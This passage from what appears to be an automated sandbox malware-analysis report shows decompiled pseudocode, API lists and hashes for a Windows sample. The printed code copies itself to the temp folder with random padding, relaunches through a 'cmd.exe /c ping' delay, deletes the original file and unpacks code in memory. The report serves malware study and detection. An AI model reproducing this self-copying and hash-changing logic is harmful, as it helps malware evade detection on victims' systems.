                                                    				E004B6088();
                                                    				asm("popad");
                                                    				 *[fs:0x0] = _t191;
                                                    				_v96.hStdOutput = _t191 - 0x68;
                                                    				_v16 = 0;
                                                    				 *0x4172ec(2, _t176, _t185, _t157,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t188);
                                                    				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
                                                    				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
                                                    				_t132 =  *0x4172f0();
                                                    				_t165 =  *0x41c9b8; // 0x0
                                                    				 *_t132 = _t165;
                                                    				_t133 =  *0x4172f4();
                                                    				_t166 =  *0x41c9b4; // 0x0
                                                    				 *_t133 = _t166;
                                                    				_t134 =  *0x4172fc; // 0x74896be4
                                                    				 *0x41cbdc =  *_t134;
                                                    				_t136 = E0041559B( *_t134);
                                                    				_t204 =  *0x41c8c8; // 0x1
                                                    				if(_t204 == 0) {
                                                    					_t136 =  *0x4172e4(E00415598);
                                                    				}
                                                    				E00415586(_t136);
                                                    				L00415580();
                                                    				_t138 =  *0x41c9b0; // 0x0
                                                    				_v112 = _t138;
                                                    				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
                                                    				_push(0x41c024);
                                                    				_push(0x41c000); // executed
                                                    				L00415580(); // executed
                                                    				_t144 =  *0x4172d8; // 0x74895b9c
                                                    				_t186 =  *_t144;
                                                    				_v120 = _t186;
                                                    				if( *_t186 != 0x22) {
                                                    					while( *_t186 > 0x20) {
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    						_t151 =  *_t186;
                                                    					} while (_t151 != 0 && _t151 != 0x22);
                                                    					if( *_t186 == 0x22) {
                                                    						L7:
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    					}
                                                    				}
                                                    				_t145 =  *_t186;
                                                    				if(_t145 != 0 && _t145 <= 0x20) {
                                                    					goto L7;
                                                    				}
                                                    				_v96.dwFlags = 0;
                                                    				GetStartupInfoA( &_v96);
                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                    					_t147 = 0xa;
                                                    				} else {
                                                    					_t147 = _v96.wShowWindow & 0x0000ffff;
                                                    				}
                                                    				_t149 = E004155C6(GetModuleHandleA(0), _t148, 0, _t186, _t147);
                                                    				_v108 = _t149;
                                                    				exit(_t149);
                                                    				_t150 = _v24;
                                                    				_t168 =  *((intOrPtr*)( *_t150));
                                                    				_v124 = _t168;
                                                    				_push(_t150);
                                                    				_push(_t168);
                                                    				L0041557A();
                                                    				return _t150;
                                                    				goto L75;
                                                    			}
                                                    0x004b6954
                                                    0x004b694d
                                                    0x004b694d
                                                    0x004b694d
                                                    0x004b695d
                                                    0x004b6971
                                                    0x004b697e
                                                    0x004b6984
                                                    0x004b698f
                                                    0x004b6991
                                                    0x004b6997
                                                    0x004b699d
                                                    0x004b699d
                                                    0x004b69a3
                                                    0x004b69ae
                                                    0x004b69b0
                                                    0x004b69bc
                                                    0x004b69bc
                                                    0x004b69c2
                                                    0x004b69c4
                                                    0x004b69e2
                                                    0x004b6a06
                                                    0x004b6a1c
                                                    0x004b6a22
                                                    0x004b69e4
                                                    0x004b69f8
                                                    0x004b69fe
                                                    0x004b69c6
                                                    0x004b69d4
                                                    0x004b69da
                                                    0x004b6a36
                                                    0x004b6a4c
                                                    0x004b6a52
                                                    0x004b6a53
                                                    0x00000000
                                                    0x004b6a53
                                                    0x004b5f8b
                                                    0x004b5f8a
                                                    0x004b5f8a
                                                    0x004b5f90
                                                    0x004b5f92
                                                    0x004b5f94
                                                    0x004b5f99
                                                    0x004b5f9c
                                                    0x00000000
                                                    0x004b5f9c
                                                    0x00000000
                                                    0x004b5eff
                                                    0x004b5fbb
                                                    0x004b5fd1
                                                    0x004b5fdc
                                                    0x004b5fe1
                                                    0x00415426
                                                    0x00415433
                                                    0x00415438
                                                    0x0041543d
                                                    0x00415444
                                                    0x0041544b
                                                    0x00415452
                                                    0x00415458
                                                    0x0041545e
                                                    0x00415460
                                                    0x00415466
                                                    0x0041546c
                                                    0x0041546e
                                                    0x00415475
                                                    0x0041547a
                                                    0x0041547f
                                                    0x00415485
                                                    0x0041548c
                                                    0x00415492
                                                    0x00415493
                                                    0x004154a2
                                                    0x004154a7
                                                    0x004154ac
                                                    0x004154c5
                                                    0x004154cb
                                                    0x004154d0
                                                    0x004154d5
                                                    0x004154dd
                                                    0x004154e2
                                                    0x004154e4
                                                    0x004154ea
                                                    0x00415526
                                                    0x0041552b
                                                    0x0041552c
                                                    0x0041552c
                                                    0x004154ec
                                                    0x004154ec
                                                    0x004154ec
                                                    0x004154ed
                                                    0x004154f0
                                                    0x004154f2
                                                    0x004154fd
                                                    0x004154ff
                                                    0x004154ff
                                                    0x00415500
                                                    0x00415500
                                                    0x004154fd
                                                    0x00415503
                                                    0x00415507
                                                    0x00000000
                                                    0x00000000
                                                    0x0041550d
                                                    0x00415514
                                                    0x0041551e
                                                    0x00415533
                                                    0x00415520
                                                    0x00415520
                                                    0x00415520
                                                    0x0041553f
                                                    0x00415544
                                                    0x00415548
                                                    0x0041554e
                                                    0x00415553
                                                    0x00415555
                                                    0x00415558
                                                    0x00415559
                                                    0x0041555a
                                                    0x00415561
                                                    0x00000000

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,000C2000,00001000,00000040), ref: 004B5DE4
                                                    • VirtualAlloc.KERNELBASE(00000000,00000BBC,00001000,00000040,?), ref: 004B5E87
                                                    • VirtualFree.KERNELBASE(?,00000BBC,00004000), ref: 004B5FBB
                                                    • VirtualFree.KERNELBASE(?,000C2000,00004000), ref: 004B5FD1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
                                                    • Instruction ID: 24e4992b9d6948e21e8e4bedf5f1e11d57e5dbc52c2922d56559ceabe911fcce
                                                    • Opcode Fuzzy Hash: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
                                                    • Instruction Fuzzy Hash: 0691E471944689EFEF31AF60CC09BEABB65EF05300F210016F94E5A291D3B95B51DB2A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 74%
                                                    			E00401703(void* __ecx) {
                                                    				void* _t15;
                                                    				void* _t28;
                                                    				void* _t30;
                                                    
                                                    				L004153D0();
                                                    				_t28 = __ecx;
                                                    				_push(0);
                                                    				L00415208();
                                                    				L00415202();
                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *0x417284())) + 4)) == 0) {
                                                    					E00401194(); // executed
                                                    				}
                                                    				_t15 = E004013BC(); // executed
                                                    				if(_t15 != 0) {
                                                    					ExitProcess(0xffffffff); // executed
                                                    				}
                                                    				_push(0);
                                                    				E00401831(_t30 - 0x90);
                                                    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                    				 *((intOrPtr*)(_t28 + 0x20)) = _t30 - 0x90;
                                                    				L004151FC();
                                                    				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
                                                    				E0040178C(_t30 - 0x90);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                                    				return 0;
                                                    			}







                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 00401708
                                                    • __p___argv.MSVCRT ref: 00401725
                                                    • ExitProcess.KERNEL32 ref: 00401743
                                                      • Part of subcall function 00401194: memset.MSVCRT ref: 004011B5
                                                      • Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011C4
                                                      • Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011E6
                                                      • Part of subcall function 00401194: Sleep.KERNEL32(00000064), ref: 004011FB
                                                      • Part of subcall function 00401194: GetTickCount.KERNEL32 ref: 00401233
                                                      • Part of subcall function 00401194: GetTempPathA.KERNEL32(00000104,?), ref: 00401263
                                                      • Part of subcall function 00401194: wsprintfA.USER32 ref: 00401280
                                                      • Part of subcall function 00401194: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
                                                      • Part of subcall function 00401194: time.MSVCRT ref: 004012AA
                                                      • Part of subcall function 00401831: _EH_prolog.MSVCRT ref: 00401836
                                                      • Part of subcall function 00401831: LoadIconA.USER32(00000000,00000080), ref: 004018D8
                                                      • Part of subcall function 0040178C: _EH_prolog.MSVCRT ref: 00401791
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: H_prolog__p___argv$CountCreateExitFileIconLoadPathProcessSleepTempTickmemsettimewsprintf
                                                    • String ID:
                                                    • API String ID: 3574655727-0
                                                    • Opcode ID: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
                                                    • Instruction ID: d643b5abc61cb50e4851cccbfb1eddeb9cb1e70d3b45357e864f9708fc649bd8
                                                    • Opcode Fuzzy Hash: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
                                                    • Instruction Fuzzy Hash: 08016D31910514CFDB24FB75C80ABDCB7B4BF44318F4042AEA425A35E2EB789A44CA59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 187 40100c-401030 call 4151e4 __p___argv DeleteFileA
                                                    C-Code - Quality: 58%
                                                    			E0040100C(intOrPtr* __ecx) {
                                                    				intOrPtr* _t7;
                                                    
                                                    				_t7 = __ecx;
                                                    				L004151E4();
                                                    				 *__ecx = 0x417368;
                                                    				DeleteFileA( *( *((intOrPtr*)( *0x417284(0))) + 4)); // executed
                                                    				return _t7;
                                                    			}





                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile__p___argv
                                                    • String ID:
                                                    • API String ID: 2264924877-0
                                                    • Opcode ID: 453613419905931ceb74943f40faada2a6ce75f82fc200d5faaff9cf141e643d
                                                    • Instruction ID: fa09fb3c8641d5cc015e2d4a925410924725748b1339da5762470490f22408cc
                                                    • Opcode Fuzzy Hash: 453613419905931ceb74943f40faada2a6ce75f82fc200d5faaff9cf141e643d
                                                    • Instruction Fuzzy Hash: 36D0C9306482109FC7416F58EC09BC47AB0FB49311B0180AAF8008B220DBB44840CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 190 415340-415347 191 415355-41536b __dllonexit 190->191 192 415349-415354 _onexit 190->192
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: __dllonexit_onexit
                                                    • String ID:
                                                    • API String ID: 2384194067-0
                                                    • Opcode ID: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
                                                    • Instruction ID: 98d401c415d6678ea52b1c0f42600251c3288c2a67878add2b384861b0e27a05
                                                    • Opcode Fuzzy Hash: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
                                                    • Instruction Fuzzy Hash: 8CC0123168D600FBCA005710BD47ACA3B22A790F76B6482ABF465D40F0D77D7450B90D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 193 4b7114-4b711b 194 4b7141-4b7144 193->194 195 4b711d-4b7126 194->195 196 4b7146-4b7147 194->196 198 4b7138 195->198 199 4b7128-4b7131 LoadLibraryA 195->199 201 4b713b-4b713e 198->201 199->198 200 4b7133 call 4b7148 199->200 200->198 203 4b713a 201->203 204 4b7140 201->204 203->201 204->194
                                                    C-Code - Quality: 82%
                                                    			E004B7114(struct HINSTANCE__* __eax) {
                                                    				struct HINSTANCE__* _t4;
                                                    				CHAR* _t7;
                                                    				void* _t8;
                                                    
                                                    				_t4 = __eax;
                                                    				asm("pushad");
                                                    				_t7 =  *(_t8 + 0x2647);
                                                    				while( *_t7 != 1) {
                                                    					_t4 =  *((intOrPtr*)(_t8 + 0xb05))(_t7);
                                                    					if(_t4 == 0) {
                                                    						_t4 = LoadLibraryA(_t7);
                                                    						if(_t4 == 0) {
                                                    							_t4 = E004B7148(_t7);
                                                    						}
                                                    					}
                                                    					while( *_t7 != 0) {
                                                    						_t7 =  &(_t7[1]);
                                                    					}
                                                    					_t7 =  &(_t7[1]);
                                                    				}
                                                    				asm("popad");
                                                    				return _t4;
                                                    			}







                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 004B7129
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
                                                    • Instruction ID: 28aa9155c9c21b83bdb7bcef97a423d10cb3e5a31c1a923e1a5360d2fc2f006b
                                                    • Opcode Fuzzy Hash: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
                                                    • Instruction Fuzzy Hash: 6EE0122054D5A566DF322F2C48057EA7AD06FA2354F211466E4C6A5701F7AC0D829BFE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00401A9F(void* __ecx, void* __edx) {
                                                    				struct tagRECT _v20;
                                                    				signed int _v100;
                                                    				void* _v104;
                                                    				int _t15;
                                                    				int _t20;
                                                    				int _t21;
                                                    				int _t36;
                                                    				void* _t44;
                                                    				void* _t49;
                                                    
                                                    				_t44 = __edx;
                                                    				_t49 = __ecx;
                                                    				_t15 = IsIconic( *(__ecx + 0x20));
                                                    				if(_t15 == 0) {
                                                    					L0041530A();
                                                    					return _t15;
                                                    				}
                                                    				_push(_t49);
                                                    				L00415316();
                                                    				asm("sbb eax, eax");
                                                    				SendMessageA( *(_t49 + 0x20), 0x27,  ~( &_v104) & _v100, 0);
                                                    				_t20 = GetSystemMetrics(0xb);
                                                    				_t21 = GetSystemMetrics(0xc);
                                                    				GetClientRect( *(_t49 + 0x20),  &_v20);
                                                    				asm("cdq");
                                                    				asm("cdq");
                                                    				_t36 = DrawIcon(_v100, _v20.right - _v20.left - _t20 + 1 - _t44 >> 1, _v20.bottom - _v20.top - _t21 + 1 - _t44 >> 1,  *(_t49 + 0x80));
                                                    				L00415310();
                                                    				return _t36;
                                                    			}













                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00401AAB
                                                    • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401AD2
                                                    • GetSystemMetrics.USER32(0000000B), ref: 00401AE0
                                                    • GetSystemMetrics.USER32(0000000C), ref: 00401AE6
                                                    • GetClientRect.USER32(?,?), ref: 00401AF1
                                                    • DrawIcon.USER32(?,?,?,?), ref: 00401B1E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                    • String ID:
                                                    • API String ID: 2166663075-0
                                                    • Opcode ID: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
                                                    • Instruction ID: 088e3e68de5ff62e47a0c8f7cb64779c5762a4f9d9f917aba8eef08205d66377
                                                    • Opcode Fuzzy Hash: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
                                                    • Instruction Fuzzy Hash: B511517261021DAFCB00ABB8DD49EEEB7B9FB84304F044629F956D70A0DB74E901DB14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c792754ec9edb6c26f15a7f47a1957124246a507d0db3e88f47c55cabad0487
                                                    • Instruction ID: fb82d8e2b907d47e0205e0c15bac6958ef862b02caeeb255dfc9c4c68bb3a339
                                                    • Opcode Fuzzy Hash: 1c792754ec9edb6c26f15a7f47a1957124246a507d0db3e88f47c55cabad0487
                                                    • Instruction Fuzzy Hash: 15F03CB5444108FEEF07AF55C6824E97F63FF41341F11850BB9481AA02D33EDA61AB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 58%
                                                    			E00401194() {
                                                    				long _v8;
                                                    				int _v12;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				int _v24;
                                                    				void* _v28;
                                                    				long _v32;
                                                    				void* _v47;
                                                    				char _v48;
                                                    				void _v307;
                                                    				char _v308;
                                                    				void _v567;
                                                    				char _v568;
                                                    				void _v827;
                                                    				char _v828;
                                                    				void _v1851;
                                                    				char _v1852;
                                                    				void* _t55;
                                                    				signed int _t66;
                                                    				void* _t77;
                                                    				int _t78;
                                                    				signed int _t97;
                                                    				intOrPtr _t99;
                                                    				intOrPtr _t100;
                                                    				void* _t106;
                                                    				signed int _t107;
                                                    				signed int _t111;
                                                    				void* _t120;
                                                    				int _t126;
                                                    				void* _t134;
                                                    				void* _t136;
                                                    				void* _t144;
                                                    
                                                    				L004151F6();
                                                    				_t120 = _t55;
                                                    				_v20 = _t120;
                                                    				memset(_t120, 0, 0x100000);
                                                    				_v12 = 0;
                                                    				E004010DF(_t106, _t144, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x100000))))),  &_v12);
                                                    				_t136 = _t134 + 0x1c;
                                                    				_t145 =  *_t120 - 0x4d;
                                                    				if( *_t120 == 0x4d) {
                                                    					L2:
                                                    					_t107 = 0x40;
                                                    					_v308 = 0;
                                                    					_v48 = 0;
                                                    					memset( &_v307, 0, _t107 << 2);
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					asm("stosd");
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					E0040107C( &_v48, 5);
                                                    					_t66 = GetTickCount();
                                                    					_v8 = _t66 & 0x000001ff;
                                                    					_t111 = 0x40;
                                                    					_v568 = 0;
                                                    					memset( &_v567, 0, _t111 << 2);
                                                    					asm("stosw");
                                                    					asm("stosb");
                                                    					GetTempPathA(0x104,  &_v568);
                                                    					wsprintfA( &_v308, "%s\\%s.exe",  &_v568,  &_v48);
                                                    					_t77 = CreateFileA( &_v308, 0x40000000, 2, 0, 2, 0x80, 0);
                                                    					_v16 = _t77;
                                                    					_t78 =  *0x417270(0);
                                                    					srand(_t78);
                                                    					_push(_v8);
                                                    					L004151F6();
                                                    					_t126 = _t78;
                                                    					_v24 = 0;
                                                    					_v28 = _t126;
                                                    					if(_v8 <= 0) {
                                                    						L4:
                                                    						Sleep(0x64);
                                                    						WriteFile(_v16, _v20, _v12,  &_v32, 0);
                                                    						Sleep(0x64);
                                                    						WriteFile(_v16, _v28, _v8,  &_v32, 0);
                                                    						CloseHandle(_v16);
                                                    						L004151EA();
                                                    						L004151EA();
                                                    						_v1852 = 0;
                                                    						memset( &_v1851, 0, 0xff << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_v828 = 0;
                                                    						memset( &_v827, 0, 0 << 2);
                                                    						asm("stosw");
                                                    						asm("stosb");
                                                    						_push( *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x40, _v20, _v28))))));
                                                    						_push( &_v828);
                                                    						L004153C0();
                                                    						wsprintfA( &_v1852, "cmd.exe /c ping 127.0.0.1 -n 2&%s \"%s\"",  &_v308,  &_v828);
                                                    						WinExec( &_v1852, 0);
                                                    						Sleep(0x1f4);
                                                    						ExitProcess(0xffffffff);
                                                    					} else {
                                                    						goto L3;
                                                    					}
                                                    					do {
                                                    						L3:
                                                    						_t97 = rand();
                                                    						asm("cdq");
                                                    						_t99 = _v24;
                                                    						 *((char*)(_t99 + _t126)) = _t97 % 0xff - _t99;
                                                    						_t100 = _t99 + 1;
                                                    						_v24 = _t100;
                                                    					} while (_t100 < _v8);
                                                    					goto L4;
                                                    				} else {
                                                    					goto L1;
                                                    				}
                                                    				do {
                                                    					L1:
                                                    					E004010DF(_t106, _t145, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284())))),  &_v12);
                                                    					_t136 = _t136 + 0xc;
                                                    					Sleep(0x64);
                                                    				} while ( *_t120 != 0x4d);
                                                    				goto L2;
                                                    			}




































                                                    APIs
                                                    • memset.MSVCRT ref: 004011B5
                                                    • __p___argv.MSVCRT ref: 004011C4
                                                      • Part of subcall function 004010DF: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
                                                    • __p___argv.MSVCRT ref: 004011E6
                                                      • Part of subcall function 004010DF: memset.MSVCRT ref: 00401141
                                                      • Part of subcall function 004010DF: ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401159
                                                      • Part of subcall function 004010DF: memcpy.MSVCRT ref: 00401174
                                                      • Part of subcall function 004010DF: CloseHandle.KERNEL32(?), ref: 00401186
                                                    • Sleep.KERNEL32(00000064), ref: 004011FB
                                                    • GetTickCount.KERNEL32 ref: 00401233
                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 00401263
                                                    • wsprintfA.USER32 ref: 00401280
                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
                                                    • time.MSVCRT ref: 004012AA
                                                    • srand.MSVCRT ref: 004012B1
                                                    • rand.MSVCRT ref: 004012CF
                                                    • Sleep.KERNEL32(00000064), ref: 004012F0
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401306
                                                    • Sleep.KERNEL32(00000064), ref: 0040130A
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040131A
                                                    • CloseHandle.KERNEL32(?), ref: 0040131F
                                                    • __p___argv.MSVCRT ref: 00401363
                                                    • _mbscpy.MSVCRT ref: 00401374
                                                    • wsprintfA.USER32 ref: 00401393
                                                    • WinExec.KERNEL32(?,00000000), ref: 004013A4
                                                    • Sleep.KERNEL32(000001F4), ref: 004013AF
                                                    • ExitProcess.KERNEL32 ref: 004013B3
                                                    Strings
                                                    • %s\%s.exe, xrefs: 0040127A
                                                    • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 0040138D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: File$Sleep$__p___argv$CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTick_mbscpymemcpyrandsrandtime
                                                    • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                    • API String ID: 3198981119-2816570591
                                                    • Opcode ID: 2682df70523cec0996b0936c980b707a910b3e4237ae95f3caab59d1c3965546
                                                    • Instruction ID: d2297b8266ecacfc823cd110b5f5006d7f60a8736864fb2ea4bbb2a36b220300
                                                    • Opcode Fuzzy Hash: 2682df70523cec0996b0936c980b707a910b3e4237ae95f3caab59d1c3965546
                                                    • Instruction Fuzzy Hash: E8515B72D44209BFDB11ABE4CC89ADEBFB9EB48300F1044B6F204E6160DA795B44CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 44%
                                                    			E00401B41(void* __ecx, void* __edx, long long __fp0) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				char* _t229;
                                                    				char* _t247;
                                                    				signed int _t253;
                                                    				intOrPtr* _t256;
                                                    				char* _t258;
                                                    				signed int _t261;
                                                    				char* _t285;
                                                    				signed int _t292;
                                                    				char* _t303;
                                                    				void* _t304;
                                                    				signed int _t310;
                                                    				signed int _t312;
                                                    				char* _t317;
                                                    				void* _t320;
                                                    				void* _t335;
                                                    				void* _t342;
                                                    				void* _t365;
                                                    				signed int _t380;
                                                    				void* _t382;
                                                    				signed int _t389;
